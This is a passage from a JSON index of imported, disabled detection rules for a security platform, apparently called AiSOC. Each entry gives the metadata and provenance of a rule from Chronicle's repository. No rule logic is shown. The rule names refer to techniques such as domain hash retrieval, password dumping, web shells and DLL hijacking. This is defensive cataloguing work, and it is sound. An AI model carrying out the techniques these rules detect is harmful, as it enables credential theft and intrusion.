"chronicle-detection-rules-abusing-azure-browser-sso", "type": "detection", "name": "abusing_azure_browser_sso", "description": "abusing_azure_browser_sso", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-azure-browser-sso.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_azure_browser_sso", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_azure_browser_sso.yaral" } }, { "id": "chronicle-detection-rules-abusing-managebdewsf", "type": "detection", "name": "abusing_managebdewsf", "description": "abusing_managebdewsf", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-managebdewsf.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_managebdewsf", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/abusing_manage_bde_wsf.yaral" } }, { 
"id": "chronicle-detection-rules-abusing-security-support-provider-and-authentication-packages", "type": "detection", "name": "abusing_security_support_provider_and_authentication_packages", "description": "abusing_security_support_provider_and_authentication_packages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-security-support-provider-and-authentication-packages.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_security_support_provider_and_authentication_packages", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_security_support_provider_and_authentication_packages.yaral" } }, { "id": "chronicle-detection-rules-abusing-settingcontentms-to-launch-arbitrary-shell-command-execution", "type": "detection", "name": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "description": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-settingcontentms-to-launch-arbitrary-shell-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_settingcontentms_to_launch_arbitrary_shell_command_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/abusing_settingcontent_ms_to_launch_arbitrary_shell_command_execution.yaral" } }, { "id": "chronicle-detection-rules-abusing-windows-telemetry-compattelrunnerexeaudit-rule", "type": "detection", "name": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "description": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/abusing-windows-telemetry-compattelrunnerexeaudit-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "abusing_windows_telemetry_compattelrunnerexeaudit_rule", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/abusing_windows_telemetry_compattelrunner_exe_audit_rule.yaral" } }, { "id": "chronicle-detection-rules-access-to-admin-share", "type": "detection", "name": "access_to_admin_share", "description": "access_to_admin_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/access-to-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "access_to_admin_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/access_to_admin__share.yaral" } }, { "id": "chronicle-detection-rules-account-discovery-activity-detector-sysmon-behavior", "type": "detection", "name": "account_discovery_activity_detector_sysmon_behavior", "description": "account_discovery_activity_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/account-discovery-activity-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "account_discovery_activity_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/account_discovery_activity_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-account-tampering-suspicious-failed-logon-reasons", "type": "detection", "name": 
"account_tampering__suspicious_failed_logon_reasons", "description": "account_tampering__suspicious_failed_logon_reasons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/account-tampering-suspicious-failed-logon-reasons.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "account_tampering__suspicious_failed_logon_reasons", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/account_tampering___suspicious_failed_logon_reasons.yaral" } }, { "id": "chronicle-detection-rules-acer-quick-access-dll-searchorder-hijacking-and-potential-abuses", "type": "detection", "name": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "description": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/acer-quick-access-dll-searchorder-hijacking-and-potential-abuses.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "acer_quick_access__dll_searchorder_hijacking_and_potential_abuses", "source_commit": 
"74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/acer_quick_access___dll_search_order_hijacking_and_potential_abuses.yaral" } }, { "id": "chronicle-detection-rules-active-directory-as-a-c2-command-control", "type": "detection", "name": "active_directory_as_a_c2_command__control", "description": "active_directory_as_a_c2_command__control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/active-directory-as-a-c2-command-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "active_directory_as_a_c2_command__control", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/active_directory_as_a_c2__command___control.yaral" } }, { "id": "chronicle-detection-rules-active-directory-replication-from-non-machine-account", "type": "detection", "name": "active_directory_replication_from_non_machine_account", "description": "active_directory_replication_from_non_machine_account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/active-directory-replication-from-non-machine-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "active_directory_replication_from_non_machine_account", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/active_directory_replication_from_non_machine_account.yaral" } }, { "id": "chronicle-detection-rules-activity-related-to-ntdsdit-domain-hash-retrieval", "type": "detection", "name": "activity_related_to_ntdsdit_domain_hash_retrieval", "description": "activity_related_to_ntdsdit_domain_hash_retrieval", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/activity-related-to-ntdsdit-domain-hash-retrieval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "activity_related_to_ntdsdit_domain_hash_retrieval", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/activity_related_to_ntds_dit_domain_hash_retrieval.yaral" } }, { "id": "chronicle-detection-rules-ad-privileged-users-or-groups-reconnaissance", "type": "detection", "name": "ad_privileged_users_or_groups_reconnaissance", "description": 
"ad_privileged_users_or_groups_reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ad-privileged-users-or-groups-reconnaissance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ad_privileged_users_or_groups_reconnaissance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ad_privileged_users_or_groups_reconnaissance.yaral" } }, { "id": "chronicle-detection-rules-add-programs-to-firewall-exclusion-from-temp-directory-sysmon", "type": "detection", "name": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "description": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/add-programs-to-firewall-exclusion-from-temp-directory-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "add_programs_to_firewall_exclusion_from_temp_directory_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/add_programs_to_firewall_exclusion_from_temp_directory__sysmon.yaral" } }, { "id": "chronicle-detection-rules-addition-of-sid-history-to-active-directory-object", "type": "detection", "name": "addition_of_sid_history_to_active_directory_object", "description": "addition_of_sid_history_to_active_directory_object", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/addition-of-sid-history-to-active-directory-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "addition_of_sid_history_to_active_directory_object", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/active_directory_security/windows/addition_of_sid_history_to_active_directory_object.yaral" } }, { "id": "chronicle-detection-rules-adfs-db-suspicious-named-pipe-connection", "type": "detection", "name": "adfs_db_suspicious_named_pipe_connection", "description": "adfs_db_suspicious_named_pipe_connection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/adfs-db-suspicious-named-pipe-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adfs_db_suspicious_named_pipe_connection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/adfs/adfs_db_suspicious_named_pipe_connection.yaral" } }, { "id": "chronicle-detection-rules-adfs-dkm-key-access", "type": "detection", "name": "adfs_dkm_key_access", "description": "adfs_dkm_key_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adfs-dkm-key-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adfs_dkm_key_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/adfs/adfs_dkm_key_access.yaral" } }, { "id": "chronicle-detection-rules-admin-user-rdp", "type": "detection", "name": "admin_user_rdp", "description": "admin_user_rdp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/admin-user-rdp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "admin_user_rdp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/admin_user_rdp.yaral" } }, { "id": "chronicle-detection-rules-admin-user-remote-logon", "type": "detection", "name": "admin_user_remote_logon", "description": "admin_user_remote_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/admin-user-remote-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "admin_user_remote_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/admin_user_remote_logon.yaral" } }, { "id": "chronicle-detection-rules-adwind-detection", "type": "detection", "name": "adwind_detection", "description": "adwind_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/adwind-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_detection.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat", "type": "detection", "name": "adwind_rat__jrat", "description": "adwind_rat__jrat", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-rat-jrat.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_1.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat-part-1", "type": "detection", "name": "adwind_rat__jrat_part_1", "description": "adwind_rat__jrat_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/adwind-rat-jrat-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_2.yaral" } }, { "id": "chronicle-detection-rules-adwind-rat-jrat-part-2", "type": "detection", "name": "adwind_rat__jrat_part_2", "description": "adwind_rat__jrat_part_2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/adwind-rat-jrat-part-2.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "adwind_rat__jrat_part_2", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/adwind_rat___jrat_part_3.yaral" } }, { "id": "chronicle-detection-rules-agenttesla-rat-detection", "type": "detection", "name": "agenttesla_rat_detection", "description": "agenttesla_rat_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/agenttesla-rat-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "agenttesla_rat_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/agenttesla_rat_detection.yaral" } }, { "id": "chronicle-detection-rules-amadey-botnet-detection-ta505", "type": "detection", "name": "amadey_botnet_detection_ta505", "description": "amadey_botnet_detection_ta505", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/amadey-botnet-detection-ta505.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "amadey_botnet_detection_ta505", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/amadey_botnet_detection__ta505_part_1.yaral" } }, { "id": "chronicle-detection-rules-amadey-botnet-detection-ta505-part-1", "type": "detection", "name": "amadey_botnet_detection_ta505_part_1", "description": "amadey_botnet_detection_ta505_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": 
null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/amadey-botnet-detection-ta505-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "amadey_botnet_detection_ta505_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/amadey_botnet_detection__ta505_part_2.yaral" } }, { "id": "chronicle-detection-rules-anomalous-invocation-of-cmdexe", "type": "detection", "name": "anomalous_invocation_of_cmdexe", "description": "anomalous_invocation_of_cmdexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/anomalous-invocation-of-cmdexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "anomalous_invocation_of_cmdexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/anomalous_invocation_of_cmd_exe.yaral" } }, { "id": "chronicle-detection-rules-anonymous-user-changed-machine-password", "type": "detection", "name": "anonymous_user_changed_machine_password", "description": "anonymous_user_changed_machine_password", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/anonymous-user-changed-machine-password.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "anonymous_user_changed_machine_password", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/security/anonymous_user_changed_machine_password.yaral" } }, { "id": "chronicle-detection-rules-antivirus-exploitation-framework-detection", "type": "detection", "name": "antivirus_exploitation_framework_detection", "description": "antivirus_exploitation_framework_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-exploitation-framework-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_exploitation_framework_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_exploitation_framework_detection.yaral" } }, { "id": "chronicle-detection-rules-antivirus-password-dumper-detection", "type": "detection", "name": "antivirus_password_dumper_detection", "description": "antivirus_password_dumper_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-password-dumper-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_password_dumper_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/antivirus/antivirus_password_dumper_detection.yaral" } }, { "id": "chronicle-detection-rules-antivirus-relevant-file-paths-alerts", "type": "detection", "name": "antivirus_relevant_file_paths_alerts", "description": "antivirus_relevant_file_paths_alerts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-relevant-file-paths-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_relevant_file_paths_alerts", "source_commit": 
"74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_relevant_file_paths_alerts.yaral" } }, { "id": "chronicle-detection-rules-antivirus-web-shell-detection", "type": "detection", "name": "antivirus_web_shell_detection", "description": "antivirus_web_shell_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/antivirus-web-shell-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "antivirus_web_shell_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/antivirus_web_shell_detection.yaral" } }, { "id": "chronicle-detection-rules-appinit-dll-hijacking-sysmon-behaviour", "type": "detection", "name": "appinit_dll_hijacking_sysmon_behaviour", "description": "appinit_dll_hijacking_sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/appinit-dll-hijacking-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
